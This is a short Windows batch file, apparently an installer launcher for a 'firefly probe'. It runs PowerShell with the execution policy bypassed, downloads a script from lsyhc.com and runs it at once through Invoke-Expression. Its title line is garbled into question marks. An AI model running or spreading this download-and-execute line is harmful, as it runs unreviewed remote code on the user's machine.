﻿@echo off
chcp 65001 >nul
title ???????????
powershell -NoProfile -ExecutionPolicy Bypass -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 } catch {}; (New-Object Net.WebClient).DownloadString('https://lsyhc.com/downloads/firefly-probe-install.ps1') | Invoke-Expression"
pause
